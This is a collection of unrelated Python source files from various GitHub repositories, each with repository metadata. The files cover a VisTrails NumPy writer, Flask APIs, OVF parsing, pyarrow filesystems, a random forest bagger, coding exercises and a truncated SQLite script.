return frame_name, track_id, x, y, box_width, box_height, class_id
|
Salmon-Computer-Vision/salmon-computer-vision
|
utils/utils.py
|
utils.py
|
py
| 455 |
python
|
en
|
code
| 4 |
github-code
|
6
|
859362304
|
from __future__ import division
from vistrails.core.modules.vistrails_module import Module
from ..common import get_numpy
from ..read.read_numpy import NumPyArray
class WriteNumPy(Module):
"""Writes a list as a Numpy file.
NumPy can use one of two schemes: either 'plain' binary arrays, i.e. just
the binary representation of the data format (in this case you must specify
the exact format to get the original data back), or the NPY format, i.e.
.npy files that know what the actual structure of the array is.
"""
_input_ports = [
('array', '(org.vistrails.vistrails.basic:List)'),
('datatype', '(org.vistrails.vistrails.basic:String)',
{'entry_types': "['enum']",
'values': "[%r]" % NumPyArray.FORMATS})]
_output_ports = [('file', '(org.vistrails.vistrails.basic:File)')]
def compute(self):
numpy = get_numpy()
array = self.get_input('array')
if not isinstance(array, numpy.ndarray):
array = numpy.array(array)
dtype = NumPyArray.get_format(self.get_input('datatype'))
if dtype is NumPyArray.NPY_FMT:
fileobj = self.interpreter.filePool.create_file(suffix='.npy')
fname = fileobj.name
# Numpy's ".NPY" format
numpy.save(fname, array)
else:
fileobj = self.interpreter.filePool.create_file(suffix='.dat')
fname = fileobj.name
# Numpy's plain binary format
array.astype(dtype).tofile(fname)
self.set_output('file', fileobj)
_modules = [WriteNumPy]
###############################################################################
import unittest
class WriteNumpyTestCase(unittest.TestCase):
def test_raw_numpy(self):
"""Uses WriteNumPy to write an array in raw format.
"""
import array
from vistrails.tests.utils import execute, intercept_result
from ..identifiers import identifier
with intercept_result(WriteNumPy, 'file') as results:
self.assertFalse(execute([
('write|WriteNumPy', identifier, [
('array', [('List', '[0, 1, 258, 6758]')]),
('datatype', [('String', 'uint32')]),
]),
]))
self.assertEqual(len(results), 1)
expected_bytes = [0, 0, 0, 0,
1, 0, 0, 0,
2, 1, 0, 0,
102, 26, 0, 0]
with open(results[0].name, 'rb') as fp:
self.assertEqual(fp.read(),
array.array('B', expected_bytes).tostring())
def test_npy_numpy(self):
"""Uses WriteNumPy to write an array in .NPY format.
"""
import numpy
from vistrails.tests.utils import execute, intercept_result
from ..identifiers import identifier
with intercept_result(WriteNumPy, 'file') as results:
self.assertFalse(execute([
('write|WriteNumPy', identifier, [
('array', [('List', '[0, 1, 258, 6758]')]),
('datatype', [('String', 'npy')]),
]),
]))
self.assertEqual(len(results), 1)
self.assertEqual(list(numpy.load(results[0].name)), [0, 1, 258, 6758])
def test_write_read(self):
"""Uses WriteNumPy and NumPyArray to write then read an array.
"""
from vistrails.tests.utils import execute, intercept_result
from ..identifiers import identifier
for dtype in ('npy', 'uint32'):
with intercept_result(NumPyArray, 'value') as results:
self.assertFalse(execute([
('write|WriteNumPy', identifier, [
('array', [('List', '[0, 1, 258, 6758]')]),
('datatype', [('String', dtype)]),
]),
('read|NumPyArray', identifier, [
('datatype', [('String', dtype)]),
]),
], [
(0, 'file', 1, 'file'),
]))
self.assertEqual(len(results), 1)
self.assertEqual(list(results[0]), [0, 1, 258, 6758])
|
VisTrails/VisTrails
|
vistrails/packages/tabledata/write/write_numpy.py
|
write_numpy.py
|
py
| 4,325 |
python
|
en
|
code
| 100 |
github-code
|
6
|
10844685453
|
from database import db
from flask import request
from middleware.auth import login_required, admin_only
from models.guild import Guild
from typing import Dict, Optional, Tuple
def check_request(req: request, id_only: Optional[bool] = False) -> int | Tuple[int, str, bool] | Tuple[Dict[str, str], int]:
# Check request body
guild_name = ''
guild_manage_threads = False
try:
guild_id = req.json['id']
if not isinstance(guild_id, int):
raise ValueError('id must be an integer')
if not id_only:
guild_name = req.json.get('name', guild_name)
guild_manage_threads = req.json.get('manage_threads', guild_manage_threads)
if 'name' in req.json and not isinstance(guild_name, str):
raise ValueError('name must be a string')
if 'name' in req.json and not 0 < len(guild_name) < 256:
raise ValueError('name must be between 0 to 256 characters long')
if 'manage_threads' in req.json and not isinstance(guild_manage_threads, bool):
raise ValueError('manage_threads must be a boolean')
except KeyError as e:
return {
'success': False,
'error': f'Missing key in request body: {e}'
}, 400
except ValueError as e:
return {
'success': False,
'error': f'Bad value: {e}'
}, 400
else:
if id_only:
return guild_id
else:
return guild_id, guild_name, guild_manage_threads
@admin_only
def add_guild():
# Check request body
check_result = check_request(request)
if isinstance(check_result[0], dict):
return check_result
guild_id, guild_name, guild_manage_threads = check_result
# Check if guild is already in DB
guild = Guild.query.get(guild_id)
if guild is not None:
return {
'success': False,
'error': 'Guild already exists'
}, 409
# Create guild
guild = Guild(
id=guild_id,
name=guild_name,
manage_threads=guild_manage_threads
)
# Add to DB
db.session.add(guild)
db.session.commit()
return {
'success': True
}
@admin_only
def update_guild():
# Check request body
check_result = check_request(request)
if isinstance(check_result[0], dict):
return check_result
guild_id, guild_name, guild_manage_threads = check_result
# Check if guild is already in DB
guild = Guild.query.get(guild_id)
if guild is None:
return {
'success': False,
'error': f'Guild {guild_id} does not exist'
}, 404
# Update existing guild
if 'name' in request.json:
guild.name = guild_name
if 'manage_threads' in request.json:
guild.manage_threads = guild_manage_threads
# Commit
db.session.commit()
return {
'success': True
}, 200
@admin_only
def delete_guild():
# Check request body
check_result = check_request(request, id_only=True)
if isinstance(check_result, tuple) and isinstance(check_result[0], dict):
return check_result
guild_id = check_result
# Check if guild is in DB
guild = Guild.query.get(guild_id)
if guild is not None:
# Delete user
db.session.delete(guild)
db.session.commit()
return {
'success': True
}, 200
@login_required
def get_guild():
# Check request body
check_result = check_request(request, id_only=True)
if isinstance(check_result, tuple) and isinstance(check_result[0], dict):
return check_result
guild_id = check_result
# Check if guild is in DB
guild = Guild.query.get(guild_id)
if guild is None:
return {
'success': False,
'error': 'Guild not found'
}, 404
# Return guild data
return {
'success': True,
'guild': {
'name': guild.name,
'manage_threads': guild.manage_threads
}
}, 200
|
jareddantis-bots/rico-backend
|
api/guilds.py
|
guilds.py
|
py
| 4,053 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29456781892
|
from six.moves.urllib import parse
import tarfile
from lxml import etree
from atrope import exception
SPECS = {
'http://www.vmware.com/interfaces/specifications/vmdk.html': 'vmdk',
'https://people.gnome.org/~markmc/qcow-image-format.html': 'qcow',
}
def _get_tarfile(ova):
if not tarfile.is_tarfile(ova):
raise exception.CannotOpenFile(reason="not a valid 'tar' file")
return tarfile.open(ova)
def extract_file(ova, filename):
tf = _get_tarfile(ova)
fd = tf.extractfile(filename)
return fd
def get_disk_name(ovf):
"""Get the disk format and file name from a OVF descriptor."""
root = etree.fromstring(ovf)
ovf_ns = root.nsmap['ovf']
id_attr = '{%s}id' % ovf_ns
href_attr = '{%s}href' % ovf_ns
files = {f.get(id_attr): f.get(href_attr) for f in
root.findall('ovf:References/ovf:File', root.nsmap)}
# we do not care about more than one disk
disk = root.find('ovf:DiskSection/ovf:Disk', root.nsmap)
if disk is not None:
format_attr = '{%s}format' % ovf_ns
fileref_attr = '{%s}fileRef' % ovf_ns
ovf_format = disk.get(format_attr)
if not ovf_format:
raise Exception("Expecting some format!")
(format_url, _) = parse.urldefrag(ovf_format)
try:
disk_format = SPECS[format_url]
except KeyError:
raise Exception("Unknown format!")
try:
disk_file = files[disk.get(fileref_attr)]
except KeyError:
raise Exception("Unknown disk!")
return (disk_format, disk_file)
return None, None
def get_ovf(ova):
"""Return an OVF descriptor as stored in an OVA file, if any."""
tf = _get_tarfile(ova)
ovf = None
for name in tf.getnames():
if name.endswith(".ovf"):
ovf = tf.extractfile(name).read()
break
if ovf is None:
raise exception.InvalidOVAFile(reason="cannot find a .ovf descriptor")
return ovf
|
alvarolopez/atrope
|
atrope/ovf.py
|
ovf.py
|
py
| 1,986 |
python
|
en
|
code
| 2 |
github-code
|
6
|
30137635
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests
import json
url = "http://localhost:6332"
headers = {'content-type': 'application/json'}
def get_result(payload):
response = requests.post(
url, data=json.dumps(payload), headers=headers).json()
return json.dumps(response)
def get_all_address():
payload = {
"method": "getalladdress",
"params": {},
"jsonrpc": "2.0",
"id": 1,
}
content = json.loads(get_result(payload))
content=content["result"]
address_arr=[]
for (v) in content:
address=v.split("-")[2]
address_arr.append(address)
return json.dumps(address_arr)
def get_balance():
payload = {
"method": "getbalance",
"params": {},
"jsonrpc": "2.0",
"id": 1,
}
content = json.loads(get_result(payload))
pending=(content["result"]["base"]["pending"])/1000000
stable=(content["result"]["base"]["stable"])/1000000
balance=pending+stable
return json.dumps({"balance":balance,"pending":pending,"stable":stable})
def check_address(address):
payload = {
"method": "checkAddress",
"params": [address],
"jsonrpc": "2.0",
"id": 1,
}
return get_result(payload)
def pay(address,amount,msg):
if not msg:
payload = {
"method": "sendtoaddress",
"params": [address,amount*1000000],
"jsonrpc": "2.0",
"id": 1,
}
else:
payload = {
"method": "sendtoaddresswithmessage",
"params": [address,amount*1000000,msg],
"jsonrpc": "2.0",
"id": 1,
}
return get_result(payload)
|
taozywu/token_light
|
rpc.py
|
rpc.py
|
py
| 1,701 |
python
|
en
|
code
| 0 |
github-code
|
6
|
25240137017
|
n, f = map(int, input().split())
ciclo = list(map(int, input().split()))
PrimeiroDia = 1
UltimoDia = 10**8
while PrimeiroDia < UltimoDia:
aux = int((PrimeiroDia + UltimoDia) / 2)
total = 0
for i in range(len(ciclo)):
total = total + (aux // ciclo[i])
if total >= f:
UltimoDia = aux
else:
PrimeiroDia = aux + 1
print(UltimoDia)
|
MateusFerreiraMachado/Programas_Python
|
capsulas.py
|
capsulas.py
|
py
| 376 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
27161595951
|
# Written by RF
while True:
Q=float(input("What number would you like to square? "))
H=float(input("How many times would you like to square it? "))
S=((Q)**H)
print("The", H, "square is", S)
while True:
answer = str(input('Anything else? (y/n): '))
if answer in ('y', 'n'):
break
print("invalid input.")
if answer == 'y':
continue
else:
print("Godspeed")
break
|
GustavMH29/Python
|
Code/Math/Equations/Square.py
|
Square.py
|
py
| 450 |
python
|
en
|
code
| 0 |
github-code
|
6
|
39687962974
|
# Time:O(n)
# Space:O(n)
class Solution:
def productExceptSelf(self, nums: List[int]) -> List[int]:
left_prod = [1]
for num in nums:
left_prod.append(left_prod[-1]*num)
right_prod = [1]
for num in reversed(nums):
right_prod.insert(0, right_prod[0]*num)
op = []
for i in range(1, len(nums)+1):
op.append(left_prod[i-1]*right_prod[i])
return op
|
cmattey/leetcode_problems
|
30DayChallenge_April/april_15_product_except_self.py
|
april_15_product_except_self.py
|
py
| 446 |
python
|
en
|
code
| 4 |
github-code
|
6
|
73815074426
|
from user.models import User
from rest_framework import exceptions
def get_user(username):
user = None
if "@" in username:
try:
user = User.objects.get(email=username)
except User.DoesNotExist:
user = User.objects.create(
username=username,
email=username
)
elif username.isdigit():
try:
user = User.objects.get(phone_no=username)
except User.DoesNotExist:
user = User.objects.create(
username=username,
phone_no=username
)
else:
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
raise exceptions.NotFound("User matching username was not found!")
return user
|
Python-Crew/base_drf
|
auth_user/services.py
|
services.py
|
py
| 815 |
python
|
en
|
code
| 1 |
github-code
|
6
|
9758869645
|
from app import app, db
import json
from tests.lib import login
def test_get_products():
client = app.test_client()
response = client.get("/api/products")
assert len(response.json) == 27
assert response.status_code == 200
def test_get_single_product():
client = app.test_client()
response = client.get("/api/products/1")
assert response.json["product_name"] == "White Trainers"
assert response.status_code == 200
|
hannahakhtar/golden-shoes
|
server/tests/test_products.py
|
test_products.py
|
py
| 454 |
python
|
en
|
code
| 0 |
github-code
|
6
|
33387732761
|
import numpy as np
from sklearn.tree import DecisionTreeClassifier
from .sampler import FeatureSampler, ObjectSampler
class Bagger:
def __init__(self, base_estimator, object_sampler, feature_sampler, n_estimators=10, **params):
"""
n_estimators : int
number of base estimators
base_estimator : class
class for base_estimator with fit(), predict() and predict_proba() methods
feature_sampler : instance of FeatureSampler
object_sampler : instance of ObjectSampler
n_estimators : int
number of base_estimators
params : kwargs
params for base_estimator initialization
"""
self.n_estimators = n_estimators
self.base_estimator = base_estimator
self.feature_sampler = feature_sampler
self.object_sampler = object_sampler
self.estimators = []
self.indices = []
self.params = params
def fit(self, X, y):
"""
for i in range(self.n_estimators):
1) select random objects and answers for train
2) select random indices of features for current estimator
3) fit base_estimator (don't forget to remain only selected features)
4) save base_estimator (self.estimators) and feature indices (self.indices)
NOTE that self.base_estimator is class and you should init it with
self.base_estimator(**self.params) before fitting
"""
self.estimators = []
self.indices = []
for i in range(self.n_estimators):
X_sampled, y_sampled = self.object_sampler.sample(X, y)
feature_indices = self.feature_sampler.sample_indices(X.shape[1])
estimator = self.base_estimator(**self.params)
estimator.fit(X_sampled[:, feature_indices], y_sampled)
self.estimators.append(estimator)
self.indices.append(feature_indices)
return self
def predict_proba(self, X):
"""
Returns
-------
probas : numpy ndarrays of shape (n_objects, n_classes)
Calculate mean value of all probas from base_estimators
Don't forget, that each estimator has its own feature indices for prediction
"""
if not (0 < len(self.estimators) == len(self.indices)):
raise RuntimeError('Bagger is not fitted', (len(self.estimators), len(self.indices)))
predicts = []
for estimator, feature_indices in zip(self.estimators, self.indices):
predict = estimator.predict_proba(X[:, feature_indices])
predicts.append(predict)
return np.mean(np.array(predicts), axis=0)
def predict(self, X):
"""
Returns
-------
predictions : numpy ndarrays of shape (n_objects, )
"""
return np.argmax(self.predict_proba(X), axis=1)
class RandomForestClassifier(Bagger):
def __init__(self, n_estimators=30, max_objects_samples=0.9, max_features_samples=0.8,
max_depth=None, min_samples_leaf=1, random_state=None, **params):
base_estimator = DecisionTreeClassifier
object_sampler = ObjectSampler(max_samples=max_objects_samples, random_state=random_state)
feature_sampler = FeatureSampler(max_samples=max_features_samples, random_state=random_state)
super().__init__(
base_estimator=base_estimator,
object_sampler=object_sampler,
feature_sampler=feature_sampler,
n_estimators=n_estimators,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
**params,
)
|
TotalChest/MLprograms
|
RandomForest/random_forest.py
|
random_forest.py
|
py
| 3,665 |
python
|
en
|
code
| 0 |
github-code
|
6
|
35544157808
|
import calendar
from datetime import datetime
class Util:
DATE_FORMAT = '%Y-%m-%d'
def get_month_start_date(datetime):
return datetime.date().replace(day=1)
def get_month_end_date(datetime):
year = datetime.year
month = datetime.month
monthrange = calendar.monthrange(year, month)
return datetime.date().replace(day=monthrange[1])
class CalendarEvent:
def __init__(self, date, event):
self.date = date
self.event = event
class HTMLEventCalendar(calendar.HTMLCalendar):
# CSS classes for the day <td>s
cssclasses = ["mon", "tue", "wed", "thu", "fri", "sat", "sun"]
# CSS classes for the day <th>s
cssclasses_weekday_head = cssclasses
# CSS class for the days before and after current month
cssclass_noday = "noday"
# CSS class for the month's head
cssclass_month_head = "month"
# CSS class for the month
cssclass_month = "month"
# CSS class for the year's table head
cssclass_year_head = "year"
# CSS class for the whole year table
cssclass_year = "year"
cssclass_event = "calendar-event"
cssclass_day_number = "day-number"
def __init__(self, firstweekday=calendar.MONDAY, events={}):
super().__init__(firstweekday)
self.events = events
def get_event(self, day, month, year):
date = datetime.strptime("{}-{}-{}".format(year, month, day),
Util.DATE_FORMAT)
date_string = date.strftime(Util.DATE_FORMAT)
return self.events.get(date_string, '')
def formatday(self, day, weekday, themonth=None, theyear=None):
"""
Return a day as a table cell.
"""
if day == 0:
# day outside month
return '<td class="%s"> </td>' % self.cssclass_noday
else:
event = self.get_event(day, themonth, theyear)
html = """
<td class="%s">
<div class="%s">%s</div>
<div class="%s">%d</div>
</td>""" % (self.cssclasses[weekday],
self.cssclass_event, event,
self.cssclass_day_number, day)
return html
def formatweek(self, theweek, themonth=None, theyear=None):
"""
Return a complete week as a table row.
"""
s = ''.join(self.formatday(d, wd, themonth, theyear)
for (d, wd) in theweek)
return '<tr>%s</tr>' % s
def formatmonth(self, theyear, themonth, withyear=True):
"""
Return a formatted month as a table.
"""
v = []
a = v.append
a('<table border="0" cellpadding="0" cellspacing="0" class="%s">' % (
self.cssclass_month))
a('\n')
a(self.formatmonthname(theyear, themonth, withyear=withyear))
a('\n')
a(self.formatweekheader())
a('\n')
for week in self.monthdays2calendar(theyear, themonth):
a(self.formatweek(week, theyear=theyear, themonth=themonth))
a('\n')
a('</table>')
a('\n')
return ''.join(v)
|
bluepostit/di-python-2019
|
daily-exercises/week9/visitors/calendar.py
|
calendar.py
|
py
| 3,141 |
python
|
en
|
code
| 1 |
github-code
|
6
|
5118772924
|
from flask import current_app, Blueprint,request, jsonify
from vpnresolve import VPNResolve
import json
import logging
logger = logging.getLogger( "ucn_logger" )
ios_api = Blueprint('ios_api', __name__)
@ios_api.route("/viz/ios/log", methods=['POST'])
def log():
vpnres = VPNResolve(current_app.config["CIDR"], {"db":current_app.config["MONGODB"],"collection":current_app.config["VPNLOGSCOLLECTION"],"host":current_app.config["MONGOHOST"], "port":current_app.config["MONGOPORT"]})
host = vpnres.clientip(request)
if host is None:
return jsonify(success="False")
logger.debug("saving ios data for host %s", host)
data = request.get_json(force=False)
logger.debug("received data for host %s" % host)
#shove the processes into the table in bulk!
success= True
if 'processes' in data:
logger.debug("saving ios process data for host %s", host)
success = current_app.config["datadb"].bulk_insert_processes(host,data['processes'])
if success:
logger.debug("sucessfully saved ios process data for host %s", host)
else:
logger.error("failed to save ios process data")
if 'network' in data:
logger.debug("saving ios network for host %s", host)
success = success and current_app.config["datadb"].insert_network_data(host, data['network'])
if success:
logger.debug("sucessfully saved ios network data for host %s", host)
else:
logger.error("failed to save ios network data")
logger.error(data['network'])
return jsonify(success= "True" if success else "False")
|
ucn-eu/ucnviz
|
ucnserver/ios.py
|
ios.py
|
py
| 1,522 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5503800628
|
# https://www.hackerrank.com/challenges/np-dot-and-cross/problem
import numpy
numpy.set_printoptions(legacy='1.13')
def zero(size):
return [0 for _ in range(size)]
def get_matrix(size):
matrix = []
for _ in range(size):
matrix.append(list(map(int, input().split())))
return matrix
N = int(input())
matrix1 = numpy.array(get_matrix(N))
matrix2 = numpy.array(get_matrix(N)).transpose()
result = []
for row in range(N):
result.append(zero(N))
for column in range(N):
result[row][column] = int(numpy.dot(matrix1[row], matrix2[column]))
print(numpy.array(result))
|
Nikit-370/HackerRank-Solution
|
Python/dot-cross.py
|
dot-cross.py
|
py
| 608 |
python
|
en
|
code
| 10 |
github-code
|
6
|
26221879462
|
from pyarrow._fs import ( # noqa
FileSelector,
FileType,
FileInfo,
FileSystem,
LocalFileSystem,
SubTreeFileSystem,
_MockFileSystem,
_normalize_path,
FileSystemHandler,
PyFileSystem,
)
# For backward compatibility.
FileStats = FileInfo
_not_imported = []
try:
from pyarrow._hdfs import HadoopFileSystem # noqa
except ImportError:
_not_imported.append("HadoopFileSystem")
try:
from pyarrow._s3fs import ( # noqa
S3FileSystem, S3LogLevel, initialize_s3, finalize_s3)
except ImportError:
_not_imported.append("S3FileSystem")
else:
initialize_s3()
def __getattr__(name):
if name in _not_imported:
raise ImportError(
"The pyarrow installation is not built with support for "
"'{0}'".format(name)
)
raise AttributeError(
"module 'pyarrow.fs' has no attribute '{0}'".format(name)
)
def _ensure_filesystem(filesystem, use_mmap=False):
if isinstance(filesystem, FileSystem):
return filesystem
# handle fsspec-compatible filesystems
try:
import fsspec
except ImportError:
pass
else:
if isinstance(filesystem, fsspec.AbstractFileSystem):
if type(filesystem).__name__ == 'LocalFileSystem':
# In case its a simple LocalFileSystem, use native arrow one
return LocalFileSystem(use_mmap=use_mmap)
return PyFileSystem(FSSpecHandler(filesystem))
# map old filesystems to new ones
from pyarrow.filesystem import LocalFileSystem as LegacyLocalFileSystem
if isinstance(filesystem, LegacyLocalFileSystem):
return LocalFileSystem(use_mmap=use_mmap)
# TODO handle HDFS?
raise TypeError("Unrecognized filesystem: {}".format(type(filesystem)))
class FSSpecHandler(FileSystemHandler):
"""
Handler for fsspec-based Python filesystems.
https://filesystem-spec.readthedocs.io/en/latest/index.html
>>> PyFileSystem(FSSpecHandler(fsspec_fs))
"""
def __init__(self, fs):
self.fs = fs
def __eq__(self, other):
if isinstance(other, FSSpecHandler):
return self.fs == other.fs
return NotImplemented
def __ne__(self, other):
if isinstance(other, FSSpecHandler):
return self.fs != other.fs
return NotImplemented
def get_type_name(self):
protocol = self.fs.protocol
if isinstance(protocol, list):
protocol = protocol[0]
return "fsspec+{0}".format(protocol)
@staticmethod
def _create_file_info(path, info):
size = info["size"]
if info["type"] == "file":
ftype = FileType.File
elif info["type"] == "directory":
ftype = FileType.Directory
# some fsspec filesystems include a file size for directories
size = None
else:
ftype = FileType.Unknown
return FileInfo(path, ftype, size=size, mtime=info.get("mtime", None))
def get_file_info(self, paths):
infos = []
for path in paths:
try:
info = self.fs.info(path)
except FileNotFoundError:
infos.append(FileInfo(path, FileType.NotFound))
else:
infos.append(self._create_file_info(path, info))
return infos
def get_file_info_selector(self, selector):
if not self.fs.isdir(selector.base_dir):
if self.fs.exists(selector.base_dir):
raise NotADirectoryError(selector.base_dir)
else:
if selector.allow_not_found:
return []
else:
raise FileNotFoundError(selector.base_dir)
if selector.recursive:
maxdepth = None
else:
maxdepth = 1
infos = []
selected_files = self.fs.find(
selector.base_dir, maxdepth=maxdepth, withdirs=True, detail=True
)
for path, info in selected_files.items():
infos.append(self._create_file_info(path, info))
return infos
def create_dir(self, path, recursive):
# mkdir also raises FileNotFoundError when base directory is not found
self.fs.mkdir(path, create_parents=recursive)
def delete_dir(self, path):
self.fs.rm(path, recursive=True)
def _delete_dir_contents(self, path):
for subpath in self.fs.listdir(path, detail=False):
if self.fs.isdir(subpath):
self.fs.rm(subpath, recursive=True)
elif self.fs.isfile(subpath):
self.fs.rm(subpath)
def delete_dir_contents(self, path):
if path.strip("/") == "":
raise ValueError(
"delete_dir_contents called on path '", path, "'")
self._delete_dir_contents(path)
def delete_root_dir_contents(self):
self._delete_dir_contents("/")
def delete_file(self, path):
# fs.rm correctly raises IsADirectoryError when `path` is a directory
# instead of a file and `recursive` is not set to True
if not self.fs.exists(path):
raise FileNotFoundError(path)
self.fs.rm(path)
def move(self, src, dest):
self.fs.mv(src, dest, recursive=True)
def copy_file(self, src, dest):
# fs.copy correctly raises IsADirectoryError when `src` is a directory
# instead of a file
self.fs.copy(src, dest)
def open_input_stream(self, path):
from pyarrow import PythonFile
if not self.fs.isfile(path):
raise FileNotFoundError(path)
return PythonFile(self.fs.open(path, mode="rb"), mode="r")
def open_input_file(self, path):
from pyarrow import PythonFile
if not self.fs.isfile(path):
raise FileNotFoundError(path)
return PythonFile(self.fs.open(path, mode="rb"), mode="r")
def open_output_stream(self, path):
from pyarrow import PythonFile
return PythonFile(self.fs.open(path, mode="wb"), mode="w")
def open_append_stream(self, path):
from pyarrow import PythonFile
return PythonFile(self.fs.open(path, mode="ab"), mode="w")
|
ejnunn/PPE-Object-Detection
|
env/lib/python3.7/site-packages/pyarrow/fs.py
|
fs.py
|
py
| 6,213 |
python
|
en
|
code
| 7 |
github-code
|
6
|
22919129693
|
from io import TextIOWrapper
import os
import argparse
files = [
'Accurect-Pointer.txt',
'Endonasal-RII.txt',
'HeadBand-Reference.txt',
'Navigation-Pointer.txt',
'Registration-Pointer.txt'
]
def readFromOriginalFormat(file: TextIOWrapper):
lines = file.readlines()
for i, line in enumerate(lines):
if line.startswith('Num Markers:'):
numMarkers = int(line.split(':')[1].strip())
if line.startswith('Marker Positions'):
break
data = lines[i+2:i+numMarkers+2]
data = [float(x) for line in data for x in line.split()]
return data, numMarkers
def writeToNewFormat(data: list, numMarkers: int, file: TextIOWrapper):
file.write(str(numMarkers) + '\n')
for i in range(0, numMarkers*3, 3):
file.write('{} {} {}\n'.format(data[i], data[i+1], data[i+2]))
file.write('\n')
if __name__ == '__main__':
argparser = argparse.ArgumentParser()
argparser.add_argument('-d', '--directory', help='root directory of the files', required=True)
args = argparser.parse_args()
if not os.path.exists(args.directory):
os.mkdir(f'{args.directory}/converted/')
for file in files:
with open(f'{args.directory}/{file}', 'r') as f:
data, numMarkers = readFromOriginalFormat(f)
with open(f'{args.directory}/converted/{file}', 'w') as f:
writeToNewFormat(data, numMarkers, f)
print(f'{file} converted')
|
odeaxcsh/ParsissCamera
|
Scripts/CovertToolPatternFilesFormat.py
|
CovertToolPatternFilesFormat.py
|
py
| 1,486 |
python
|
en
|
code
| 0 |
github-code
|
6
|
3438407871
|
"""
# Definition for a Node.
class Node:
def __init__(self, val = 0, neighbors = None):
self.val = val
self.neighbors = neighbors if neighbors is not None else []
"""
class Solution:
def cloneGraph(self, node: 'Node') -> 'Node':
if node is None:
return None
q = deque([node])
cloned_node = Node(node.val)
dic = {node: cloned_node}
while len(q) != 0:
node = q.popleft()
cloned = dic[node]
for neighbor in node.neighbors:
if neighbor not in dic:
dic[neighbor] = Node(neighbor.val)
q.append(neighbor)
cloned.neighbors.append(dic[neighbor])
return cloned_node
|
cuiy0006/Algorithms
|
leetcode/133. Clone Graph.py
|
133. Clone Graph.py
|
py
| 772 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21112708622
|
from .plugin import Plugin
import js2py
# 插件名称
name = '测试插件'
# 描述信息
description = """
仅供测试
"""
# 作者
author = 'kksanyu'
# 是否启用该插件
enable = True
# 演示js代码
jsAddFunc = """
function add(a, b) {
return a + b;
}
"""
class Demo(Plugin):
def run(self, options):
print('运行Demo::run', options.telephone)
# raise RuntimeError('测试异常')
add = js2py.eval_js(jsAddFunc)
a = 1
b = 2
c = add(a, b)
print('计算结果', c)
def instance():
return Demo(name, description, author, enable)
|
superdashu/who_are_you
|
plugins/demo.py
|
demo.py
|
py
| 623 |
python
|
en
|
code
| 5 |
github-code
|
6
|
28669919345
|
import json
import unittest
from ..base import AsyncAPITestCase
from yiyun.models import (User, Team, TeamMember, TeamMemberGroup,
Sport, Activity,
ActivityMember, TeamOrder)
from yiyun.service.order import OrderService
class UserOrderTestCase(AsyncAPITestCase):
RETAIN_DATA = False
json_header = True
REQUIRED_MODELS = [Sport, User, Team, TeamMember, TeamMemberGroup,
Activity, ActivityMember, TeamOrder]
LIST_PATH = "api/2/users/self/orders"
ORDER_DETAIL = LIST_PATH + "/{order_no}"
def setUp(self):
super(UserOrderTestCase, self).setUp()
self.initial_data()
def initial_data(self):
self.team_owner = User.create(name='test_activity')
self.team = Team.create(name='club_test_activity',
owner_id=self.team_owner.id)
self.user = self.creator = User.create(name='activity_creator')
self.activity = Activity.create(team=self.team,
creator=self.creator,
price='10', vip_price='8',
leader=self.creator,
title='just a test',
description='description',
start_time='3000-01-01 00:00:01',
end_time='3000-12-31 23:59:59')
self.order = OrderService.new_order(10, self.team, self.user,
TeamOrder.OrderType.ACTIVITY,
TeamOrder.OrderPaymentMethod.WXPAY,
self.activity.id,
title="UserOrderTest"
)
self.activity.add_member(self.user.id,
users_count=1,
price=10,
free_times=0,
total_fee=10,
order_id=self.order.id,
order_no=self.order.order_no,
payment_method=TeamOrder.OrderPaymentMethod.WXPAY,
payment_state=TeamOrder.OrderState.TRADE_BUYER_PAID,
state=TeamMember.TeamMemberState.normal)
def test_list_all_orders(self):
self.auth_user = self.user
response = self.fetch(self.LIST_PATH)
self.assertEqual(200, response.code, response.body.decode())
result = json.loads(response.body.decode())
self.assertIn("orders", result, result)
self.assertNotIn("id", result["orders"][0], result)
def test_order_detail(self):
url = self.ORDER_DETAIL.format(order_no=self.order.order_no)
# 404, not my order
self.auth_user = self.team_owner
response = self.fetch(url)
self.assertEqual(404, response.code, response.body.decode())
# 200
self.auth_user = self.user
response = self.fetch(url)
self.assertEqual(200, response.code, response.body.decode())
result = json.loads(response.body.decode())
self.assertEqual(self.user.id, result["user"]["id"], result)
if __name__ == '__main__':
unittest.main()
|
haoweiking/image_tesseract_private
|
PaiDuiGuanJia/yiyun/tests/rest/order.py
|
order.py
|
py
| 3,424 |
python
|
en
|
code
| 0 |
github-code
|
6
|
39735696907
|
class BankAccount:
# Class attributes
all_accounts = []
# Constructor for each account
def __init__(self, int_rate=0.05, balance=0):
self.int_rate = int_rate
self.balance = balance
BankAccount.all_accounts.append(self)
def deposit(self, amount):
self.balance += amount
return self
def withdraw(self, amount):
if self.balance - amount >= 0:
self.balance -= amount
return self
else:
print(f"Insufficient funds: Charging a $5 fee")
self.balance -= 5
return self
def display_account_info(self):
print(f"Balance: {self.balance}")
return self
def yield_interest(self):
if self.balance >= 0:
self.balance = self.balance + (self.balance * self.int_rate)
return self
@classmethod
def get_account_info(cls):
for inst in cls.all_accounts:
inst.display_account_info()
account1 = BankAccount()
account2 = BankAccount()
account3 = BankAccount(balance=150)
account1.deposit(10).deposit(20).deposit(1000).withdraw(75).yield_interest()
account2.deposit(300).deposit(150).withdraw(25).withdraw(5).withdraw(255).withdraw(2).yield_interest()
BankAccount.get_account_info()
|
r-lutrick/Coding-Dojo
|
Python/Fundamentals/OOP/Bank_Account/bank_account.py
|
bank_account.py
|
py
| 1,277 |
python
|
en
|
code
| 1 |
github-code
|
6
|
22251439419
|
def dell(n):
d = 2
mas = []
while d * d < n:
if n % d == 0:
mas.append(d)
mas.append(n // d)
d += 1
if d * d == n:
mas.append(d)
if len(mas) == 2:
print(*mas)
for i in range(338472, 338494 + 1):
dell(i)
|
MakinFantasy/xo
|
25/10.06/1.py
|
1.py
|
py
| 285 |
python
|
en
|
code
| 0 |
github-code
|
6
|
32727491090
|
import sqlite3
posts = [
{
'author': 'Dova Kin',
'title': 'First Post',
'content': 'First post.',
'date_posted': '20200301'
},
{
'author': 'Angi\'s Cabin',
'title': 'Second Post',
'content': 'Second post.',
'date_posted': '20200302'
},
{
'author': 'Lydia Doorblocker',
'title': 'Third Post',
'content': 'I am sworn to carry your burdens.',
'date_posted': '20200302'
}
]
deletedb = """drop table if exists posts"""
createdb = """create table if not exists posts (
